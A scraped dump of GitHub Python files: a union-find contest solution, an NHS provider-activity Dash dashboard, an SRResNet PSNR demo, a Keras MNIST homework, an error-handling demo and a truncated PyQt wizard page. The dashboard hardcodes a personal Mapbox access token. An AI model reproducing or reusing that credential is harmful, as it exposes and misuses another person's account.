input().split()))\r\nfor _ in range(M):\r\n x, y = map(int, input().split())\r\n unite(x - 1, y - 1)\r\nans = 0\r\nfor i in range(N):\r\n if same(i, p[i] - 1):\r\n ans += 1\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc097/B/4820474.py","file_name":"4820474.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"32096990448","text":"#========================================= IMPORT LIBRARIES ============================================================\nimport plotly.express as px\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table as dt\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nimport pandas as pd\nimport numpy as np\n#from tkinter import filedialog #REMEMBER this doesnt work with HEROKU deployment, must comment out before deploying this code\nimport base64\nimport plotly.graph_objs as go\nfrom datetime import date\nimport gunicorn\n\n#===================================== LOADING + TRANSFORMING THE DATA =================================================\n\n#Load Core data\ndf = pd.read_csv(r'ActualsPlanTidy_Data.csv', encoding='ISO-8859-1', low_memory=False)\n\n#Basic cleansing\ndf['Activity Count'].fillna(0, inplace=True)\ndf['Activity Count'].replace('-', 0)\n\n#print(df.shape)\ndf = df[(df['POD'] !='DNA/Cancellation (Theatres Only)') & (df['POD'] !='Number of 1/2 Day Lists (Theatres Only)') & (df['POD'] !='Chemotherapy')]\n#print(df.shape)\n\n#Load Location data\nlocation_df = pd.read_csv(r'Location_data.csv', encoding='ISO-8859-1', low_memory=False)\n\n#Join Location onto the Core df\ndf = pd.merge(df,location_df,on='Independent Provider', how='left')\nprint(df.shape)\nprint(df)\n\n#Convert Lat and Long to str for grouping\ndf['Lat'] = df['Lat'].astype(str)\ndf['Long'] = df['Long'].astype(str)\n\n\ndf_grouped = df.groupby(['Inner or Outer','Plan or Actuals','Activity Type', 'Independent Provider','STP','POD','Week Commencing Date','Lat','Long'], as_index=False)['Activity Count'].sum()\ndf_actuals = df_grouped[(df_grouped['Plan or Actuals'] =='Actuals')]\ndf_actuals.rename(columns={\"Activity Count\": \"Actual Activity\"}, inplace=True)\ndf_plan = df_grouped[(df_grouped['Plan or Actuals'] =='Plan')]\ndf_plan.rename(columns={\"Activity Count\": \"Plan Activity\"}, inplace=True)\n\nprint(df_actuals.shape)\nprint(df_plan.shape)\n\n\n#Now we need to merge the datasets so we have 2 extra fact columns - plan and capacity values, this will be much easier to plot on tables/graphs\ndf_merged = df_actuals.merge(df_plan, on=['Activity Type','Independent Provider','STP','POD','Week Commencing Date'], how='left')\ndf_merged = df_merged.drop(['Inner or Outer_y','Plan or Actuals_y','Lat_y','Long_y','Plan or Actuals_x'], axis=1)\ndf_merged.rename(columns={'Inner or Outer_x':'Inner or Outer','Lat_x':'Lat','Long_x':'Long'}, inplace=True)\n\n#Find the most recent date\ndf_merged['Week Commencing Date'] = pd.to_datetime(df_merged['Week Commencing Date'], dayfirst=True)\nmost_recent_date = df_merged['Week Commencing Date'].max()\noldest_date = df_merged['Week Commencing Date'].min()\n\n#========================================= DASH LAYOUT =================================================================\n\napp = dash.Dash(__name__, eager_loading=True, external_stylesheets=[dbc.themes.LUX])\nserver = app.server\nimage_filename = r'NHS 10mm - RGB Blue on white.png' # replace with your own image - must be png image type - use this website to convert :https://jpg2png.com/\nencoded_image = base64.b64encode(open(image_filename, 'rb').read())\napp.layout = html.Div([\n dbc.Row([dbc.Col(html.H1('Independant Sector Weekly Activity Dashboard',className='dark'),style={'text-align': 'center','vertical-align':'middle'}),\n dbc.Col(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()), width=130, height=50, style={'vertical-align':'middle'}), width=1),\n ]),\n\n html.Hr(),\n\n dbc.Row(dbc.Col(html.H5('Data can be filtered using the options below',className='dark'),style={'text-align': 'center','vertical-align':'middle'})),\n\n dbc.Row([dbc.Col(dcc.Dropdown(id='POD_Dropdown',\n options=[\n {\"label\": \"Elective\", \"value\": \"Elective\"},\n {\"label\": \"Daycase\", \"value\": \"Daycase\"},\n {\"label\": \"Diagnostics\", \"value\": \"Diagnostics\"},\n {\"label\": \"Outpatients\", \"value\": \"Outpatients\"}\n ],\n multi=True,\n value=['Elective', 'Daycase'],\n style={'text-align': 'center'},\n clearable=False,\n placeholder='Please select point of delivery'\n ), width={'size':5, 'offset':1}),\n\n dbc.Col(dcc.Dropdown(id='STP_Dropdown',\n options=[\n {\"label\": \"SWL STP\", \"value\": \"South West London STP\"},\n {\"label\": \"SEL STP\", \"value\": \"South East London STP\"},\n {\"label\": \"NWL STP\", \"value\": \"North West London STP\"},\n {\"label\": \"NCL STP\", \"value\": \"North London STP\"},\n {\"label\": \"NEL STP\", \"value\": \"East London STP\"}\n ],\n multi=True,\n value=['South West London STP','South East London STP',\"North West London STP\",\"North London STP\",\"East London STP\"],\n style={'text-align': 'center'},\n clearable=False,\n placeholder='Please select your STP(s)'\n ),width={'size':5, 'offset':-1})]),\n\n\n html.Br(),\n\n dbc.Row(dbc.Col(\n dcc.Checklist(id='Checklist',\n options=[\n {'label': 'Outer Providers', 'value': 'Outer'},\n {'label': 'Inner Providers', 'value':'Inner'}\n ],\n value=['Outer'],\n inputStyle={\"margin-right\": \"10px\",\"margin-left\": \"10px\"},\n #labelStyle={'display': 'inline-block'},\n ),style={'text-align': 'center','vertical-align':'middle'})),\n\n #html.Br(),\n\n dbc.Row(dbc.Col(\n dcc.Checklist(id='Checklist-eRS',\n options=[\n {'label': 'Acute', 'value': 'Normal'},\n {'label': 'eRS', 'value': 'eRS'}\n ],\n value=['Normal','eRS'],\n inputStyle={\"margin-right\": \"10px\",\"margin-left\": \"10px\"},\n # labelStyle={'display': 'inline-block'},\n ), style={'text-align': 'center', 'vertical-align': 'middle','margin-left': '15px'})),\n\n html.Br(),\n\n html.Hr(),\n\n dcc.Tabs(id=\"tabs\", value='util-tab', children=[\n\n # TAB 1 - THE TABLE\n dcc.Tab(label='Utilisation Table', value='util-tab', children=[html.Div([\n\n html.Br(),\n dbc.Row(dbc.Col(dcc.DatePickerRange(\n id='date',\n min_date_allowed=date(1995, 8, 5),\n max_date_allowed=date(2023, 9, 1),\n initial_visible_month=date(2021, 1, 1),\n start_date=date(2021,1,1),\n end_date=date(2021,3,30),\n style={'position':'relative', 'zIndex':'999'}\n ), width={'offset': 1})),\n\n html.Div(id='Table'),\n\n html.Br(),\n\n # dbc.Row([dbc.Col(),\n # dbc.Col(dbc.Card(dbc.CardBody([html.H2(id='Card Utilisation Table',style={'text-align': 'center'},className=\"card-text\"),html.H3(\"%\",className=\"card-title\",style={'text-align': 'center'})]),color=\"rgb(188, 219, 245)\",outline=True), width={'size': 5, 'offset': -1}),\n # dbc.Col()]),\n #\n # html.Br()\n\n ])]),\n\n\n # TAB 2 - THE DASHBOARD\n dcc.Tab(label='Utilisation Dashboard', value='dash-tab', children=[\n html.Div([\n html.Br(),\n\n dbc.Row([dbc.Col(dbc.Card(dbc.CardBody([html.H3(\"Weekly Utilisation (%) ==> \" + most_recent_date.strftime('%d/%m/%y'), className=\"card-title\",style={'text-align': 'center'}),html.H2(id='Card Utilisation Week',style={'text-align': 'center'},className=\"card-text\")]),color=\"rgb(188, 219, 245)\",outline=True),width={'size': 5, 'offset': 1}),\n dbc.Col(dbc.Card(dbc.CardBody([html.H3(\"Total Utilisation (%)\",className=\"card-title\",style={'text-align': 'center'}),html.H2(id='Card Utilisation Total',style={'text-align': 'center'},className=\"card-text\")]),color=\"rgb(188, 219, 245)\",outline=True), width={'size': 5, 'offset': -1})\n ]),\n\n html.Br(),\n html.Hr(),\n\n dbc.Row([dbc.Col(dcc.Graph(id='Bar', figure={}), width={'size': 5, 'offset': 1}),\n dbc.Col(dcc.Graph(id='Line', figure={}), width={'size': 5, 'offset': -1})\n ]),\n\n html.Hr(),\n\n ])]),\n\n # TAB 3 - THE MAP\n dcc.Tab(label='Map + Upload', value='map-tab',children=[\n\n html.Br(),\n\n dbc.Row([dbc.Col(dcc.Graph(id='Map_content', figure={}))]),\n\n html.Br(),\n html.Br(),\n html.Hr(),\n html.Br(),\n\n dbc.Col(dcc.Upload(id='upload-data',children=html.Div(['Drag and Drop or ',html.A('Select Files')]),multiple=True,style={'text-align': 'center'})),\n\n html.Br(),\n html.Hr(),\n\n html.Br(),\n\n\n ])\n ])\n\n])\n\n#width={'size': 12}\n\n#=========================================== UTILISATION TABLE CALLBACK ================================================\n\n@app.callback(Output('Table', 'children'),\n #Output('Card Utilisation Table', 'children')],\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value'),\n Input(component_id='date', component_property='start_date'),\n Input(component_id='date', component_property='end_date')]\n )\ndef render_content(POD,STP,Checklist,Checklist_eRS,start_date,end_date):\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash = df_dash[(df_dash['Week Commencing Date'] >= start_date) & (df_dash['Week Commencing Date'] <= end_date)]\n df_dash_group = df_dash.groupby(['STP', 'Independent Provider'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Utilisation (%)'] = df_dash_group['Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n card = df_dash_group['Utilisation (%)'].mean()\n card = card.round(2)\n\n\n #Formatting\n df_dash_group['Actual Activity'] = df_dash_group['Actual Activity'].map('{:,.0f}'.format)#to get numbers in format correctly\n df_dash_group['Plan Activity'] = df_dash_group['Plan Activity'].map('{:,.0f}'.format) # to get numbers in format correctly\n df_dash_group['Utilisation (%)'] = df_dash_group['Utilisation (%)'].map('{:.0f}'.format) # to get numbers in format correctly\n\n return html.Div([\n\n html. Br(),\n\n dbc.Row(dbc.Col(dt.DataTable(data=df_dash_group.to_dict('rows'),\n columns=[{\"name\": i, \"id\": i} for i in df_dash_group.columns],\n sort_action='native',\n page_size=100,\n fixed_rows={'headers': True},\n style_table={'height': 800},\n style_cell_conditional=[\n {'if': {'column_id': 'STP'},\n 'width': '14%'}, # 40\n {'if': {'column_id': 'Independent Provider'},\n 'width': '35%'}, # 300\n {'if': {'column_id': 'Actual Activity'},\n 'width': '12%',\n 'textAlign': 'center'},\n {'if': {'column_id': 'Plan Activity'},\n 'width': '12%',\n 'textAlign': 'center',\n },# 5\n {'if': {'column_id': 'Utilisation (%)'},\n 'width': '9%',\n 'textAlign': 'center',\n },\n\n ],\n\n style_data_conditional=[{\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 0 && {Utilisation (%)} < 60',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'tomato',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 80',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'green',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 60 && {Utilisation (%)} < 80',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'orange',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} contains \"nan\"',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'rgb(204,204,204)',\n 'color': 'grey',\n 'fontWeight':'bold'\n }\n ],\n style_header={\n 'backgroundColor': 'rgb(188, 219, 245)',\n 'fontWeight': 'bold',\n 'textAlign': 'center',\n 'color': 'black',\n 'border': '1px solid black'\n },\n style_cell={'font_family': 'Nunito Sans',\n 'border': '1px solid grey',\n 'minWidth': 95, 'maxWidth': 95, 'width': 95,\n 'whiteSpace': 'normal'\n },\n ),width={'size':10,'offset':1}))\n ])\n\n#============================================ CARD UTILISATION TOTAL CALLBACK ==========================================\n\n@app.callback(Output('Card Utilisation Total', 'children'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash_group = df_dash.groupby(['STP', 'POD'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n df_card = df_dash_group['Plan Utilisation (%)'].mean()\n df_card = df_card.round(2)\n #df_card.map('{:.0f}'.format)\n\n return df_card\n\n#============================================ CARD UTILISATION WEEKLY CALLBACK =========================================\n\n@app.callback(Output('Card Utilisation Week', 'children'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash = df_dash[df_dash['Week Commencing Date']==most_recent_date]\n df_dash_group = df_dash.groupby(['STP', 'POD'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n df_card = df_dash_group['Plan Utilisation (%)'].mean()\n #df_card.map('{:.0f}'.format)\n df_card = df_card.round(2)\n\n return df_card\n\n#============================================ LINE GRAPH CALLBACK ======================================================\n\n@app.callback(Output('Line', 'figure'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n # df_dash = df_dash[df_dash['Week Commencing Date']==oldest_date]\n df_dash_group = df_dash.groupby(['Week Commencing Date'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Actual Activity\"], name='Actuals',\n line=dict(color='royalblue', width=4)))\n\n fig.add_trace(go.Scatter(x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Plan Activity\"], name='Plan',\n line=dict(color='firebrick', width=4, dash='dot')))\n\n fig.update_xaxes(showgrid=True, ticklabelmode=\"period\", dtick=\"M1\", tickformat=\"%b\\n%Y\", title='')\n\n fig.update_xaxes(\n rangeslider_visible=False,\n rangeselector=dict(\n buttons=list([\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n )\n )\n\n\n return fig\n\n#============================================ BAR GRAPH CALLBACK ======================================================\n\n@app.callback(Output('Bar', 'figure'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash_group = df_dash.groupby(['POD', 'Week Commencing Date'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity'] / df_dash_group['Plan Activity']) * 100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, -np.inf],np.nan)\n\n fig = px.histogram(df_dash_group, x=\"Week Commencing Date\", y=\"Plan Utilisation (%)\", histfunc=\"avg\")\n fig.update_layout(bargap=0.1)\n fig.update_xaxes(showgrid=True, ticklabelmode=\"period\", dtick=\"M1\", tickformat=\"%b\\n%Y\", title='')\n fig.add_trace(go.Scatter(mode=\"markers\", x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Plan Utilisation (%)\"], name=\"weekly values\"))\n #fig.update_traces(texttemplate='%{text:.2s}', textposition='outside')\n fig.update_layout(yaxis_title=\"Plan Utilisation (%)\",)\n fig\n\n return fig\n\n\n#============================================ MAP TAB CALLBACK =========================================================\naccess_token = 'pk.eyJ1IjoiemFpbmVpc2EiLCJhIjoiY2tlZWg0MXJvMGcwZzJyb3k1OXh0Ym55aiJ9.0SJ_VBRVxyWd6SmbdUwmKQ'\n\n@app.callback(Output('Map_content', 'figure'),\n [#Input('tabs', 'value'),\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')\n ])\n\n\ndef render_content(POD,STP,Checklist_eRS):\n\n dfmap = df_merged\n #dfmap = dfmap.drop(dfmap[(dfmap['Plan Or Actual'] == 'Actuals')].index)\n dfmap = dfmap[dfmap['POD'].isin(POD)]\n dfmap = dfmap[dfmap['STP'].isin(STP)]\n dfmap = dfmap[dfmap['Activity Type'].isin(Checklist_eRS)]\n #dfmap = dfmap[(dfmap['Week Index'] >= Date[0]) & (dfmap['Week Index'] <= Date[1])]\n # REMEMBER the as_index function turns the aggregate output from a Series into a Dataframe - important as some graphs/figures need Dfs\n dfmap_group = dfmap.groupby(['STP', 'Independent Provider', 'Lat', 'Long'], as_index=False)['Actual Activity'].sum()\n dfmap_group['Actual Activity for label'] = dfmap_group['Actual Activity'].map('{:,.0f}'.format)\n dfmap_group['Label'] = dfmap_group['Actual Activity for label'].astype(str) + ' activities at ' + dfmap_group['Independent Provider'] + ' within ' + dfmap_group['STP']\n\n locations = [go.Scattermapbox(\n lon=dfmap_group['Long'],\n lat=dfmap_group['Lat'],\n mode='markers',\n unselected={'marker': {'opacity': 0.5}},\n selected={'marker': {'opacity': 1, 'size': 50}},\n hoverinfo='text',\n hovertext=dfmap_group['Label'],\n marker=dict(\n size=dfmap_group['Actual Activity'] / 2.5,\n color='blue',\n sizemode='area'\n )\n )]\n\n return {\n 'data': locations,\n 'layout': go.Layout(\n uirevision='foo', # preserves state of figure/map after callback activated\n clickmode='event+select',\n margin=dict(l=0, r=0, t=0, b=0),\n hovermode='closest',\n hoverdistance=2,\n # title=dict(text=\"COVID CASES MAPPED\", font = dict(size=35)), #irrelevant with the margins given\n mapbox=dict(\n accesstoken=access_token,\n bearing=25,\n # style='dark', # Can enter to style the graph\n center=dict(\n lat=51.505958,\n # 51.50853, # is technically the centre of London, but the other co-ordinates fit better\n lon=-0.126770\n # -0.12574 # is technically the centre of London, but the other co-ordinates fit better\n ),\n pitch=20,\n zoom=9.5\n ),\n )\n }\n\n\n\n#=======================================================================================================================\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Zain-E/Independant-Provider-Dashboard-V2.1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44355387695","text":"import argparse, os, glob\r\nimport torch\r\nimport torchvision.transforms as transforms\r\nimport torchvision.utils as utils\r\nimport numpy as np\r\nimport time, math\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nfrom dataset import unnormalize, MEAN, STD\r\nfrom tqdm import tqdm\r\n\r\nparser = argparse.ArgumentParser(description=\"PyTorch SRResNet Demo\")\r\nparser.add_argument(\"--cuda\", action=\"store_true\", help=\"use cuda?\")\r\nparser.add_argument(\"--name\", type=str, help=\"training run name\")\r\nparser.add_argument(\"--gt\", default=\"testsets/gt\", type=str)\r\nparser.add_argument(\"--lr\", default=\"testsets/lr\", type=str)\r\nparser.add_argument(\"--mask\", default=\"testsets/masks\", type=str)\r\n# parser.add_argument(\"--scale\", default=2, type=int, help=\"scale factor, Default: 2\")\r\nparser.add_argument(\"--epoch\", default=500, type=int, help=\"training epoch\")\r\nparser.add_argument(\"--gpus\", default=\"0\", type=str, help=\"gpu ids (default: 0)\")\r\nparser.add_argument(\"--dest\", default=\"inference_on_train\", type=str)\r\n\r\ndef PSNR(pred, gt):\r\n diff = pred - gt\r\n rmse = math.sqrt(np.mean(diff ** 2))\r\n if rmse == 0:\r\n return 100\r\n return 20 * math.log10(255.0 / rmse)\r\n\r\nopt = parser.parse_args()\r\ncuda = opt.cuda\r\n\r\nmodel = torch.load(os.path.join(\"checkpoints\", opt.name, \"model_epoch_{0}.pth\").format(opt.epoch), map_location='cpu')[\"model\"]\r\nimg_tf = transforms.Compose([transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\r\nmask_tf = transforms.ToTensor()\r\n\r\nif cuda:\r\n print(\"=> use gpu id: '{}'\".format(opt.gpus))\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = opt.gpus\r\n if not torch.cuda.is_available():\r\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\r\n model = model.cuda()\r\n\r\nimgs = glob.glob(os.path.join(opt.lr, \"*.png\"))\r\noutput_dir = os.path.join(opt.dest, opt.name, str(opt.epoch))\r\nif not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\navg_psnr_bicubic = 0.0\r\navg_psnr_sr = 0.0\r\nskipped = 0\r\n\r\nfor i in tqdm(range(len(imgs))):\r\n img_name = imgs[i].split('/')[-1]\r\n\r\n im_gt = Image.open(os.path.join(opt.gt, img_name)).convert('RGB')\r\n mask = np.array(Image.open(os.path.join(opt.mask, img_name)))\r\n im_lr = Image.open(imgs[i]).convert('RGB')\r\n im_b = np.array(im_lr.resize(im_gt.size, resample=Image.BICUBIC)).astype(float)\r\n im_gt = np.array(im_gt).astype(float)\r\n\r\n mask = mask != 0\r\n mask = np.transpose(np.tile(mask, (3,1,1)), (1,2,0))\r\n if np.sum(mask) == 0:\r\n skipped += 1\r\n continue\r\n\r\n im_b = im_b[mask]\r\n im_gt = im_gt[mask]\r\n avg_psnr_bicubic += PSNR(im_b, im_gt)\r\n\r\n im_lr = img_tf(im_lr).unsqueeze_(0)\r\n if cuda:\r\n im_lr = im_lr.cuda()\r\n\r\n model.eval()\r\n out = unnormalize(model(im_lr)).cpu()\r\n utils.save_image(out, os.path.join(output_dir, img_name))\r\n\r\n out_np = out.data[0].numpy().transpose(1,2,0).astype(float) * 255.0\r\n out_np = out_np[mask]\r\n avg_psnr_sr += PSNR(out_np, im_gt)\r\n\r\nwith open(os.path.join(output_dir, \"PSNR.txt\"), 'a+') as file:\r\n n = len(imgs) - skipped\r\n file.write(\"PSNR Bicubic: {0}\\nPSNR SRResNet: {1}\".format(avg_psnr_bicubic / n, avg_psnr_sr / n))\r\n","repo_name":"bobqywei/SRResNet","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37196119385","text":"import numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import Input, layers, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense\nimport hw2_utils\nfrom hw2_utils import Splits\n\n# Load data and reshape to 28x28x1 (1 channel). Training, validation, test data\n# is then splits.train, splits.valid, splits.test . Within a split, inputs are\n# split.X and outputs are split.Y.\nsplits = Splits(*[\n split._replace(\n X=np.reshape(split.X, (split.X.shape[0], 28, 28, 1))\n )\n for split in hw2_utils.load_mnist()])\n\n\ndef build_model_mnist1():\n \"\"\"\n Create model as described in exercise. Return the tensorflow.keras.model\n object.\n \"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n input = Input(shape=(28, 28, 1))\n\n model = None\n\n # >>> Start of your code <<<\n '''Implementation of model described in section 5.1'''\n conv_1 = Conv2D(32, (5, 5), 1, activation= 'relu')(input)\n maxpool_1 = MaxPooling2D(pool_size=(2, 2), strides=2)(conv_1)\n dropout_1 = Dropout(rate=0.2)(maxpool_1)\n flatten = Flatten()(dropout_1)\n dense = Dense(128, activation='relu')(flatten)\n output = Dense(10,activation='softmax')(dense)\n model = Model(inputs=input, outputs=output)\n # >>> End of your code <<<\n return model\n\n\ndef train_model_mnist1(model, X, Y):\n \"\"\" Train the given model over the given instances. \"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n\n\n # >>> Start of your code <<<\n\n # Please use verbosity=2 for model.fit when generating evaluation log for\n # submission. DO NOT artificially inflate the training time for your first\n # model in order to pass the final test case.\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n model.fit(X, keras.utils.to_categorical(Y), batch_size=64, verbose=2, epochs=3, validation_split=0.2)\n # >>> End of your code <<<\n\n return model\n\n\ndef build_model_mnist2():\n \"\"\"Create model as described in exercise. Return the tensorflow.keras.model\n object.\"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n input = Input(shape=(28, 28, 1))\n\n model = None\n\n # >>> Start of your code <<<\n '''My implementation of a model that achieves better accuracy and converges faster than the model required above.'''\n conv_1 = Conv2D(32, (5, 5), 1, padding='same', activation='relu')(input)\n maxpool_1 = MaxPooling2D(pool_size=(2, 2), strides=2)(conv_1)\n dropout_1 = Dropout(rate=0.4)(maxpool_1)\n flatten = Flatten()(dropout_1)\n dense1 = Dense(128, activation='relu')(flatten)\n dropout_2 = Dropout(0.2)(dense1)\n output = Dense(10, activation='softmax')(dropout_2)\n model = Model(inputs=input, outputs=output)\n # >>> End of your code <<<\n\n return model\n\n\ndef train_model_mnist2(model, X, Y):\n \"\"\" Train the given model over the given instances. \"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n # >>> Start of your code <<<\n\n # Please use verbosity=2 for model.fit when generating evaluation log for\n # submission.\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.fit(X, keras.utils.to_categorical(Y), batch_size=128, verbose=2, epochs=2, validation_split=0.2)\n # >>> End of your code <<<\n\n return model\n","repo_name":"grizztastic/projects","sub_path":"Keras_Models_&_Numpy_Implementation/Keras_Model/MNIST/hw2_mnist.py","file_name":"hw2_mnist.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23122531841","text":"try:\n print(\"try....\")\n r = 10/0\n print('result:')\n#except ZeroDivisionError as e:\nexcept BaseException as e:\n print('result: ',e)\nfinally:\n print('finally')\n# 后续语句print('result:', r)不会被执行,except由于捕获到ZeroDivisionError,因此被执行。最后,finally语句被执行。然后,程序继续按照流程往下走。\n\n\n# 使用日志记录错误\nimport logging\n\ndef foo(s):\n return 10/int(s)\n\ndef bar(s):\n return foo(s) * 2\n\ndef main():\n try:\n bar('0')\n except BaseException as e:\n logging.exception(e)\n with open('test.log','w') as f:\n f.write('asdf')\n finally:\n print(\"finally\")\nif __name__ == '__main__':\n main()\n","repo_name":"iguess1220/python","sub_path":"错误处理.py","file_name":"错误处理.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28093530698","text":"from PyQt5.QtWidgets import QWizardPage, QLabel, QVBoxLayout, QSpacerItem, QSizePolicy, QHBoxLayout, QComboBox\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom os.path import join\nfrom .tools import Parser\n\n\nclass MenuWidget(QWizardPage):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setSubTitle(self.tr(\"

    Select Menu Style

    \"))\n\n texts = [\n self.tr(\"

    Application Menu is the default for KaOS because of its \\\n extremely lightweight (and fast) structure.

    \"),\n self.tr(\"

    Application Launcher is the standard for KDE. \\\n Application shortcuts are arranged under a tab structure.

    \"),\n self.tr(\"

    Application Panel is a full screen menu style. \\\n Application shortcuts are arranged so that you can access them quickly and easily.

